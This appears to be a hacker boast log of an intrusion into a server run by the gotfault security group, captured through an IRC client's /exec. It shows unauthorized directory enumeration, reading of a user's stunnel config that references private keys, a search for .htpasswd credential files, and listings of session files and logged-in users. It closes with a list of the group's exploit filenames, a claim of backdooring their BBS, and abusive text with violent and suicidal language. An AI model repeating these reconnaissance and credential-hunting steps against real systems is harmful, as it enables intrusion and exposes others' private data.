14:33 /root/bind-slave/bin/irpd/irpd.c
14:33 /root/bind-slave/bin/irpd/irpd.o
14:33 /root/bind-slave/bin/irpd/irs-irpd.conf
14:33 /root/bind-slave/bin/irpd/Makefile
14:33 /root/bind-slave/bin/irpd/tmp_version.c
14:33 /root/bind-slave/bin/irpd/tmp_version.o
14:33 /root/bind-slave/bin/irpd/version.c
14:33 /root/bind-slave/bin/Makefile
14:33 /root/bind-slave/bin/mkservdb
14:33 /root/bind-slave/bin/mkservdb/.cvsignore
14:33 /root/bind-slave/bin/mkservdb/Makefile
14:33 /root/bind-slave/bin/mkservdb/mkservdb
14:33 /root/bind-slave/bin/mkservdb/mkservdb.c


14:33 /root/bind-slave/bin/mkservdb/mkservdb.o
14:33 /root/bind-slave/bin/named
14:33 /root/bind-slave/bin/named-bootconf
14:33 /root/bind-slave/bin/named-bootconf/.cvsignore
14:33 /root/bind-slave/bin/named-bootconf/Grot
14:33 /root/bind-slave/bin/named-bootconf/Grot/named-bootconf.pl
14:33 /root/bind-slave/bin/named-bootconf/Makefile
14:33 /root/bind-slave/bin/named-bootconf/named-bootconf
14:33 /root/bind-slave/bin/named-bootconf/named-bootconf.sh
14:33 /root/bind-slave/bin/named-bootconf/test.boot
14:33 /root/bind-slave/bin/named-xfer
14:33 /root/bind-slave/bin/named-xfer/.cvsignore
14:33 /root/bind-slave/bin/named-xfer/Makefile
14:33 /root/bind-slave/bin/named-xfer/named-xfer
14:33 /root/bind-slave/bin/named-xfer/named-xfer.c
14:33 /root/bind-slave/bin/named-xfer/named-xfer.o
14:33 /root/bind-slave/bin/named/.cvsignore
14:33 /root/bind-slave/bin/named/db_defs.h
14:33 /root/bind-slave/bin/named/db_dump.c
14:33 /root/bind-slave/bin/named/db_dump.o
14:33 /root/bind-slave/bin/named/db_func.h
14:33 /root/bind-slave/bin/named/db_glob.h
14:33 /root/bind-slave/bin/named/db_glue.c
14:33 /root/bind-slave/bin/named/db_glue.o
14:33 /root/bind-slave/bin/named/db_ixfr.c
14:33 /root/bind-slave/bin/named/db_ixfr.o
14:33 /root/bind-slave/bin/named/db_load.c
14:33 /root/bind-slave/bin/named/db_load.o
14:33 /root/bind-slave/bin/named/db_lookup.c
14:33 /root/bind-slave/bin/named/db_lookup.o
14:33 /root/bind-slave/bin/named/db_save.c
14:33 /root/bind-slave/bin/named/db_save.o
14:33 /root/bind-slave/bin/named/db_sec.c
14:33 /root/bind-slave/bin/named/db_sec.o
14:33 /root/bind-slave/bin/named/db_tsig.c
14:33 /root/bind-slave/bin/named/db_tsig.o
14:33 /root/bind-slave/bin/named/db_update.c
14:33 /root/bind-slave/bin/named/db_update.o
14:33 /root/bind-slave/bin/named/Makefile
14:33 /root/bind-slave/bin/named/named
14:33 /root/bind-slave/bin/named/named.conf
14:33 /root/bind-slave/bin/named/named.h
14:33 /root/bind-slave/bin/named/ns_config.c
14:33 /root/bind-slave/bin/named/ns_config.o
14:33 /root/bind-slave/bin/named/ns_ctl.c
14:33 /root/bind-slave/bin/named/ns_ctl.o
14:33 /root/bind-slave/bin/named/ns_defs.h
14:33 /root/bind-slave/bin/named/ns_forw.c
14:33 /root/bind-slave/bin/named/ns_forw.o
14:33 /root/bind-slave/bin/named/ns_func.h
14:33 /root/bind-slave/bin/named/ns_glob.h
14:33 /root/bind-slave/bin/named/ns_glue.c
14:33 /root/bind-slave/bin/named/ns_glue.o
14:33 /root/bind-slave/bin/named/ns_init.c
14:33 /root/bind-slave/bin/named/ns_init.o
14:33 /root/bind-slave/bin/named/ns_ixfr.c
14:33 /root/bind-slave/bin/named/ns_ixfr.o
14:33 /root/bind-slave/bin/named/ns_lexer.c
14:33 /root/bind-slave/bin/named/ns_lexer.h
14:33 /root/bind-slave/bin/named/ns_lexer.o
14:33 /root/bind-slave/bin/named/ns_main.c
14:33 /root/bind-slave/bin/named/ns_main.o
14:33 /root/bind-slave/bin/named/ns_maint.c
14:33 /root/bind-slave/bin/named/ns_maint.o
14:33 /root/bind-slave/bin/named/ns_ncache.c
14:33 /root/bind-slave/bin/named/ns_ncache.o
14:33 /root/bind-slave/bin/named/ns_notify.c
14:33 /root/bind-slave/bin/named/ns_notify.o
14:33 /root/bind-slave/bin/named/ns_parser.c
14:33 /root/bind-slave/bin/named/ns_parser.h
14:33 /root/bind-slave/bin/named/ns_parser.o
14:33 /root/bind-slave/bin/named/ns_parser.y
14:33 /root/bind-slave/bin/named/ns_parseutil.c
14:33 /root/bind-slave/bin/named/ns_parseutil.h
14:33 /root/bind-slave/bin/named/ns_parseutil.o
14:33 /root/bind-slave/bin/named/ns_req.c
14:33 /root/bind-slave/bin/named/ns_req.o
14:33 /root/bind-slave/bin/named/ns_resp.c
14:33 /root/bind-slave/bin/named/ns_resp.o
14:33 /root/bind-slave/bin/named/ns_signal.c
14:33 /root/bind-slave/bin/named/ns_signal.o
14:33 /root/bind-slave/bin/named/ns_sort.c
14:33 /root/bind-slave/bin/named/ns_sort.o
14:33 /root/bind-slave/bin/named/ns_stats.c
14:33 /root/bind-slave/bin/named/ns_stats.o
14:33 /root/bind-slave/bin/named/ns_udp.c
14:33 /root/bind-slave/bin/named/ns_udp.o
14:33 /root/bind-slave/bin/named/ns_update.c
14:33 /root/bind-slave/bin/named/ns_update.o
14:33 /root/bind-slave/bin/named/ns_xfr.c
14:33 /root/bind-slave/bin/named/ns_xfr.o
14:33 /root/bind-slave/bin/named/pathnames.h
14:33 /root/bind-slave/bin/named/pathtemplate.h
14:33 /root/bind-slave/bin/named/test
14:33 /root/bind-slave/bin/named/test/127.0.0.zone
14:33 /root/bind-slave/bin/named/test/localhost.zone
14:33 /root/bind-slave/bin/named/test/loopback.ip6.zone
14:33 /root/bind-slave/bin/named/test/named.conf
14:33 /root/bind-slave/bin/named/test/root.hint
14:33 /root/bind-slave/bin/named/tmp_version.c
14:33 /root/bind-slave/bin/named/tmp_version.o
14:33 /root/bind-slave/bin/named/version.c
14:33 /root/bind-slave/bin/ndc
14:33 /root/bind-slave/bin/ndc/.cvsignore
14:33 /root/bind-slave/bin/ndc/Makefile
14:33 /root/bind-slave/bin/ndc/ndc
14:33 /root/bind-slave/bin/ndc/ndc.c
14:33 /root/bind-slave/bin/ndc/ndc.o
14:33 /root/bind-slave/bin/ndc/pathnames.h
14:33 /root/bind-slave/bin/nslookup
14:33 /root/bind-slave/bin/nslookup/.cvsignore
14:33 /root/bind-slave/bin/nslookup/commands.c
14:33 /root/bind-slave/bin/nslookup/commands.l
14:33 /root/bind-slave/bin/nslookup/commands.o
14:33 /root/bind-slave/bin/nslookup/debug.c
14:33 /root/bind-slave/bin/nslookup/debug.o
14:33 /root/bind-slave/bin/nslookup/getinfo.c
14:33 /root/bind-slave/bin/nslookup/getinfo.o
14:33 /root/bind-slave/bin/nslookup/list.c
14:33 /root/bind-slave/bin/nslookup/list.o
14:33 /root/bind-slave/bin/nslookup/main.c
14:33 /root/bind-slave/bin/nslookup/main.o
14:33 /root/bind-slave/bin/nslookup/Makefile
14:33 /root/bind-slave/bin/nslookup/nslookup
14:33 /root/bind-slave/bin/nslookup/nslookup.help
14:33 /root/bind-slave/bin/nslookup/pathnames.h
14:33 /root/bind-slave/bin/nslookup/res.h
14:33 /root/bind-slave/bin/nslookup/send.c
14:33 /root/bind-slave/bin/nslookup/send.o
14:33 /root/bind-slave/bin/nslookup/skip.c
14:33 /root/bind-slave/bin/nslookup/skip.o
14:33 /root/bind-slave/bin/nslookup/subr.c
14:33 /root/bind-slave/bin/nslookup/subr.o
14:33 /root/bind-slave/bin/nsupdate
14:33 /root/bind-slave/bin/nsupdate/.cvsignore
14:33 /root/bind-slave/bin/nsupdate/Makefile
14:33 /root/bind-slave/bin/nsupdate/nsupdate
14:33 /root/bind-slave/bin/nsupdate/nsupdate.c
14:33 /root/bind-slave/bin/nsupdate/nsupdate.o
14:33 /root/bind-slave/CHANGES
14:33 /root/bind-slave/conf
14:33 /root/bind-slave/conf/README
14:33 /root/bind-slave/conf/recursive
14:33 /root/bind-slave/conf/recursive/keep-running
14:33 /root/bind-slave/conf/recursive/named-res1.conf
14:33 /root/bind-slave/conf/recursive/named.conf.rfc1918-stubs
14:33 /root/bind-slave/conf/recursive/pri
14:33 /root/bind-slave/conf/recursive/pri/127.0.0
14:33 /root/bind-slave/conf/recursive/pri/localhost
14:33 /root/bind-slave/conf/recursive/root.cache
14:33 /root/bind-slave/conf/workstation
14:33 /root/bind-slave/conf/workstation/named.conf
14:33 /root/bind-slave/conf/workstation/pri
14:33 /root/bind-slave/conf/workstation/pri/127.0.0
14:33 /root/bind-slave/conf/workstation/pri/localhost
14:33 /root/bind-slave/conf/workstation/pri/localhost.ip6.arpa
14:33 /root/bind-slave/conf/workstation/root.cache
14:33 /root/bind-slave/conf/workstation/stub
14:33 /root/bind-slave/conf/workstation/stub/README
14:33 /root/bind-slave/DNSSEC
14:33 /root/bind-slave/include
14:33 /root/bind-slave/include/arpa
14:33 /root/bind-slave/include/arpa/inet.h
14:33 /root/bind-slave/include/arpa/Makefile
14:33 /root/bind-slave/include/arpa/nameser.h
14:33 /root/bind-slave/include/arpa/nameser_compat.h
14:33 /root/bind-slave/include/fd_setsize.h
14:33 /root/bind-slave/include/hesiod.h
14:33 /root/bind-slave/include/irp.h
14:33 /root/bind-slave/include/irs.h
14:33 /root/bind-slave/include/isc
14:33 /root/bind-slave/include/isc/assertions.h
14:33 /root/bind-slave/include/isc/ctl.h
14:33 /root/bind-slave/include/isc/dst.h
14:33 /root/bind-slave/include/isc/eventlib.h
14:33 /root/bind-slave/include/isc/heap.h
14:33 /root/bind-slave/include/isc/irpmarshall.h
14:33 /root/bind-slave/include/isc/list.h
14:33 /root/bind-slave/include/isc/logging.h
14:36 /root/bind-slave/port/winnt/include/sys/sockio.h
14:36 /root/bind-slave/port/winnt/include/sys/time.h
14:36 /root/bind-slave/port/winnt/include/sys/uio.h
14:36 /root/bind-slave/port/winnt/include/sys/un.h
14:36 /root/bind-slave/port/winnt/include/sys/wait.h
14:36 /root/bind-slave/port/winnt/include/syslog.h
14:36 /root/bind-slave/port/winnt/include/unistd.h
14:36 /root/bind-slave/port/winnt/include/utime.h
14:36 /root/bind-slave/port/winnt/include/utmp.h
14:36 /root/bind-slave/port/winnt/libbind
14:36 /root/bind-slave/port/winnt/libbind/.cvsignore
14:36 /root/bind-slave/port/winnt/libbind/dirent.c
14:36 /root/bind-slave/port/winnt/libbind/DLLMain.c
14:36 /root/bind-slave/port/winnt/libbind/files.c
14:36 /root/bind-slave/port/winnt/libbind/getopt.c
14:36 /root/bind-slave/port/winnt/libbind/interface.c
14:36 /root/bind-slave/port/winnt/libbind/ioctl_if.c
14:36 /root/bind-slave/port/winnt/libbind/libbind.def
14:36 /root/bind-slave/port/winnt/libbind/libbind.dep
14:36 /root/bind-slave/port/winnt/libbind/libbind.dsp
14:36 /root/bind-slave/port/winnt/libbind/libbind.mak
14:36 /root/bind-slave/port/winnt/libbind/libbind.rc
14:36 /root/bind-slave/port/winnt/libbind/libbind.rct
14:36 /root/bind-slave/port/winnt/libbind/nameserver.c
14:36 /root/bind-slave/port/winnt/libbind/resource.h
14:36 /root/bind-slave/port/winnt/libbind/signal.c
14:36 /root/bind-slave/port/winnt/libbind/socket.c
14:36 /root/bind-slave/port/winnt/libbind/syslog.c
14:36 /root/bind-slave/port/winnt/libbind/unistd.c
14:36 /root/bind-slave/port/winnt/makeversion.pl
14:36 /root/bind-slave/port/winnt/named
14:36 /root/bind-slave/port/winnt/named-bootconf.txt
14:36 /root/bind-slave/port/winnt/named.mak
14:36 /root/bind-slave/port/winnt/named/.cvsignore
14:36 /root/bind-slave/port/winnt/named/named.dep
14:36 /root/bind-slave/port/winnt/named/named.dsp
14:36 /root/bind-slave/port/winnt/named/named.dsw
14:36 /root/bind-slave/port/winnt/named/named.mak
14:36 /root/bind-slave/port/winnt/named/named.opt
14:36 /root/bind-slave/port/winnt/named/named.rc
14:36 /root/bind-slave/port/winnt/named/ns_ntmisc.c
14:36 /root/bind-slave/port/winnt/named/ns_ntservice.c
14:36 /root/bind-slave/port/winnt/named/ns_ntsignal.c
14:36 /root/bind-slave/port/winnt/named/ns_ntxfer.c
14:36 /root/bind-slave/port/winnt/named/resource.h
14:36 /root/bind-slave/port/winnt/nslookup
14:36 /root/bind-slave/port/winnt/nslookup/nslookup.dsp
14:36 /root/bind-slave/port/winnt/nslookup/nslookup.dsw
14:36 /root/bind-slave/port/winnt/nsupdate
14:36 /root/bind-slave/port/winnt/nsupdate/.cvsignore
14:36 /root/bind-slave/port/winnt/nsupdate/nsupdate.dep
14:36 /root/bind-slave/port/winnt/nsupdate/nsupdate.dsp
14:36 /root/bind-slave/port/winnt/nsupdate/nsupdate.dsw
14:36 /root/bind-slave/port/winnt/nsupdate/nsupdate.mak
14:36 /root/bind-slave/port/winnt/nsupdate/nsupdate.opt
14:36 /root/bind-slave/port/winnt/nsupd
14:36 -!- Irssi: process 0 (locate /root/) terminated with return code 0 ## we left alot of that out..


[14:37]/exec ls -al /home/setnf     <-- WHA!? NO WAREZ

14:37 total 4814:37 drwxrwxr-x   9   521   521 4096 Jun 14 23:16 .
14:37 drwxr-xr-x  16 root  root  4096 Jun  4 15:56 ..
14:37 drwx------   2 setnf users 4096 May 22 19:47 .BitchX14:37 -rw-------   1 setnf users 5362 Jun 15 05:40 .bash_history
14:37 drwx------   2 setnf users 4096 Apr  8 03:24 .cedit14:37 drwx------   2 setnf users 4096 May  4 14:37 .irssi
14:37 drwxr-xr-x   2 setnf users 4096 Jun  1 06:11 .mc14:37 drwx------   2 setnf users 4096 Jun 14 23:16 .ssh
14:37 -rw-------   1 setnf users 3574 May 30 22:55 .viminfo14:37 drwxr-xr-x   3 setnf users 4096 May 13 15:40 installed
14:37 drwxr-xr-x   2 setnf users 4096 May 13 15:44 ircsnet14:37 
-!- Irssi: process 0 (ls -al /home/setnf) terminated with return code 0

[14:38]ls -al /home/setnf/ircsnet/

14:38 total 2014:38 drwxr-xr-x  2 setnf users 4096 May 13 15:44 .
14:38 drwxrwxr-x  9   521   521 4096 Jun 14 23:16 ..14:38 -rw-------  1 setnf users 1233 May 13 01:24 gotfault-root-ca.pem
14:38 -rw-------  1 setnf users 2960 May 13 15:44 gotfault_key-setnf.pem
14:38 -rw-r--r--  1 setnf users  193 Jun  9 23:13 ircs.conf14:38 
-!- Irssi: process 0 (ls -al /home/setnf/ircsnet/) terminated with return code 0

cat /home~/exec/ cat /home/setnf//ircsnetircsnet/gotfault-root-ca.pem 
[14:39]14:39 cat: /home/setnf/ircsnet/gotfault-root-ca.pem: Permission denied
14:39 -!- Irssi: process 0 (cat /home/setnf/ircsnet/gotfault-root-ca.pem) terminated with return code 1

/exec cat /home/setnf/ircsnet/gotfault-root-ca.pemircs.conf

14:39 pid = /tmp/stunnel.pid
14:39 foreground = no
14:39 client = yes
14:39 CAfile = gotfault-root-ca.pem
14:39 cert = gotfault_key-setnf.pem
14:39 service = ircs
14:39 [ircs]
14:39 accept = 127.0.0.1:64714
14:39 connect = ircs.gotfault.net:994
14:39 -!- Irssi: process 0 (cat /home/setnf/ircsnet/ircs.conf) terminated with return code 0

[14:40]/exec /ls -al /tmp/

14:40 total 10814:40 drwxrwxrwx  11 root      root      4096 Jun 15 08:33 .
14:40 drwxr-xr-x  17 root      root      4096 Jun 13 02:11 ..
14:40 drwxrwxrwt   2 root      root      4096 Jun  7 01:28 .ICE-unix
14:40 drwxrwxrwt   2 root      root      4096 Jun  7 01:28 .X11-unix
14:40 drwxrwxrwx   3 root      root      4096 May 16 22:20 .uebimiau
14:40 drwxr-xr-x   2 nobody    nogroup   4096 Jun 15 04:54 .uebimiau_sessions
14:40 drwxr-xr-x   7 nobody    nogroup   4096 May 23 14:59 .uebimiaukhz_gotfault.net_mail.gotfault.net
14:40 drwxr-xr-x   7 nobody    nogroup   4096 May 16 22:55 .uebimiausetnf_gotfault.net_mail.gotfault.net
14:40 -rw-r--r--   1 posidron  users      381 May 24 00:48 glhi.c
14:40 -rw-r--r--   1 posidron  users    40253 May 17 15:37 introduction2bytecode.html
14:40 -rw-------   1 nobody    nogroup      0 Jun 10 22:21 sess_17ef306e190771eeeb9c9e7a9d5f08ee
14:40 -rw-------   1 nobody    nogroup      0 Jun 14 19:27 sess_46f62c98917079a8c4eb7d70f5f1d1cb
14:40 -rw-------   1 nobody    nogroup   3377 Jun 10 22:38 sess_a992d3cf0d2da7f90faf2e2212e111f3
14:40 -rw-------   1 nobody    nogroup      0 Jun 10 23:59 sess_c2a255c0b0fbb1c48709d11f4740599a
14:40 -rw-r--r--   1 posidron  users        5 Jun 11 23:43 stunnel.pid
14:40 -rw-r--r--   1 sirphreak users        6 Jun 10 18:21 stunnel_s.pid
14:40 drwxrwxrwx   3 www-data  www-data  4096 May 16 21:44 uebimiau
14:40 drwxr-xr-x   2 nobody    nogroup   4096 May 16 21:46 uebimiau_sessions
14:40 drwxr-xr-x   7 nobody    nogroup   4096 May 16 21:45 uebimiausetnf_gotfault.org_mail.gotfault.org
14:40 -rw-------   1 posidron  users     5362 Jun 11 22:43 zmanY91UNH
14:40 -!- Irssi: process 0 (ls -al /tmp/) terminated with return code 0 


/exec locate .htpsasswd
14:42 -!- Irssi: process 0 (locate .htpasswd) terminated with return code 1

/exec ls -al /vrar/www/14:42 total 24

14:42 drwxr-xr-x   6 root     root  4096 Jun  7 17:07 .
14:42 drwxr-xr-x  16 root     root  4096 Jun  7 01:20 ..
14:42 drwxr-xr-x   6 www-data users 4096 Jun  7 17:11 aepet.gotfault.net
14:42 drwx--x--x   9 www-data users 4096 Jun  3 03:51 gotfault.org
14:42 drwxrwxrwx   6 www-data users 4096 May 15 16:44 nutshell.gotfault.org
14:42 drwx--x--x   8 www-data users 4096 Jun  9 01:23 setnf.gotfault.org
14:42 -!- Irssi: process 0 (ls -al /var/www/) terminated with return code 0

 /exec ls -al /var/www/gotfault.org/nutshell.gotfault.org/
 
 14:43 total 3214:43 drwxrwxrwx  6 www-data users    4096 May 15 16:44 .
 14:43 drwxr-xr-x  6 root     root     4096 Jun  7 17:07 ..
 14:43 -rw-r--r--  1 www-data users      16 May 13 04:35 HEADER.html
 14:43 -rw-r--r--  1 www-data users      16 May 13 04:36 README.html
 14:43 drwxr-xr-x  2 nutshell nutshell 4096 May 13 04:09 admin
 14:43 drwxr-xr-x  2 nutshell nutshell 4096 Jun  1 05:38 exploits
 14:43 drwxr-xr-x  2 www-data users    4096 May 13 03:58 papers
 14:43 drwxr-xr-x  5 nutshell nutshell 4096 May 13 04:05 tools
 14:43 -!- Irssi: process 0 (ls -al /var/www/nutshell.gotfault.org/) terminated with return code 0
 

 /exec locate * |grep home/var/www/
 
 14:43 /var/www/gotfault.org/wmg/database
 14:43 /var/www/gotfault.org/wmg/database/index.php
 14:43 /var/www/gotfault.org/wmg/database/temporary files are stored here.txt
 14:43 /var/www/nutshell.gotfault.org/tools/shellcode_database
 14:43 /var/www/nutshell.gotfault.org/tools/shellcode_database/shellcodes.txt
 14:43 /var/www/gotfault.org/publisher
 14:43 /var/www/gotfault.org/publisher/images
 14:43 /var/www/gotfault.org/publisher/images/gotfault.png
 14:43 /var/www/gotfault.org/publisher/index.html
 14:43 /var/www/gotfault.org/publisher/publisher.htm
 14:43 -!- Irssi: process 0 (locate * |grep /var/www/) terminated with return code 0 
 
 [14:44]/exec locate * |grep /var/www//exec ls -al /var/www/nutshsetnf.gotfault.org/
 14:44 ls: /var/www/setnf.gotfault.org/: Permission denied
 14:44 -!- Irssi: process 0 (ls -al /var/www/setnf.gotfault.org/) terminated with return code 1
 
 /exec ls -al /var/www/setnf.gotfault.org/aepet.gotfault.net/
 
 14:44 total 55614:44 drwxr-xr-x  6 www-data users   4096 Jun  7 17:11 .
 14:44 drwxr-xr-x  6 root     root    4096 Jun  7 17:07 ..
 14:44 drwxr-xr-x  2 root     root    4096 Jun  7 17:11 adm
 14:44 -rw-r--r--  1 root     root    4176 Jun  6 18:14 aepet.css
 14:44 -rw-r--r--  1 setnf    users 451093 Jun  7 17:05 aepet.rar
 14:44 -rw-r--r--  1 setnf    users  53482 Jun  7 17:05 aepet_2005_06_06.sql
 14:44 -rw-r--r--  1 root     root    2513 Dec 23 15:02 css.css
 14:44 -rw-r--r--  1 root     root     265 Sep  9  2004 debug.php
 14:44 drwxr-xr-x  3 root     root    4096 Jun  7 17:11 images
 14:44 drwxr-xr-x  2 root     root    4096 Jun  7 17:11 inc
 14:44 -rw-r--r--  1 root     root     401 Apr 19 21:08 index.php
 14:44 -rw-r--r--  1 root     root    1210 Aug 18  2005 pmo.js
 14:44 drwxr-xr-x  3 root     root    4096 Jun  7 17:11 templates
 14:44 -!- Irssi: process 0 (ls -al /var/www/aepet.gotfault.net/) terminated with return code 0
 
 /exec w
 
 14:44  14:44:50 up 5 days,  2:53,  6 users,  load average: 0.06, 0.08, 0.10
 14:44 USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
 14:44 posidron pts/6     02:45   10:26   1.49s  0.00s nano samiftpd.pl
 14:44 publishe pts/20    13:47   39.00s  2.63s  0.01s /bin/sh /home/publisher/scripts
 14:44 publishe pts/23    14:28    0.00s 11.91s  0.01s /bin/sh /home/publisher/scripts
 14:44 publishe pts/24    14:02   32:22  13.10s  0.01s /bin/sh /home/publisher/scripts
 14:44 setnf    pts/25    14:14    7:02   1.04s  1.03s irssi
 14:44 setnf    pts/26    14:24   13:27   0.11s  0.01s sshd: setnf [priv]
 14:44 -!- Irssi: process 0 (w) terminated with return code 0 
 
 /exec echo 'we got owned.'
 14:46 we got owned.

14:46 -!- Irssi: process 0 (echo 'we got owned.') terminated with return code 0
 /quit
 14:46 -!- Irssi: Disconnecting from server localhost: 
 [leaving]
 14:46 -!- Irssi: Connection lost to localhost [] [1] B
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|                        |
|             ________        __    _____             .__   __               |
|            /  _____/  _____/  |__/ ____\____   __ __|  |_/  |              |
|           /   \  ___ /  _ \   __\   __\\__  \ |  |  \  |\   __\            |
|           \    \_\  (  <_> )  |  |  |   / __ \|  |  /  |_|  |              |
|            \______  /\____/|__|  |  |  (____  /____/|____/__|              |
|                   \/             |  |       \/                             |
|                                  |  |                                      |
|                <A>udits           |  |  <C>chat|
|                <T>oolbox          |  |  <B>lackboard|
|                <P>apers           |  |  <O>ptions|
|                <E>xploits         |  |  <W>ho's Online                 |
|                <S>nipplets        |__|  <L>ogout                       |
|                       |
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

gotfault> L


------------------------------------------------------------------------
here is all the code they have done if you have any better check youre box over ;)
------------------------------------------------------------------------
             3,425 gotfault-htdead.c
            12,397 gotfault-lcdproc.c
             9,783 gotfault-newspost.c
             4,940 gotfault-ngircd.c
               811 gotfault-nwlpstat.c
             4,874 gotfault-openftpd-msg.c
             4,316 gotfault-pbs4q.c
            13,930 gotfault-putty.c
            13,519 gotfault-realmagicV2.c
               396 gotfault-sing.sh
             5,963 gotfault-vmpsd.c
             1,100 gotfault-zebedee.c
            64,171 gotfault-zebedee-win32.zip
             9,312 gotfault-exim.tar.gz
             5,052 gotfault-3cdsmash.c
            14,261 gotfault-psoproxy.c
            13,501 gotfault-pcwsd.c
           174,080 gotfault.tar
             1,287 flow-as.pl
             1,106 flow-bar.pl
               939 flow-compress.pl
             3,094 flow-psoproxy.pl
             2,068 flow-sox1.pl
             2,231 flow-sox2.pl
             2,231 flow-sox3.pl
             1,062 picasmxpl.pl
===============================================================
Seeing how easy this box was to own made me want to stop hacking, quit my job,
kill my familly, kick my dog, and then kill myself. 
All that code is absolutely fucking useless it exploits almost nothing good 
and is all PoC, learn to code, learn to audit better shit and die.
-
when i connected later they spotted my connection and killed my session while 
i was backdooring the shitty BBS they coded and ran.
===============================================================
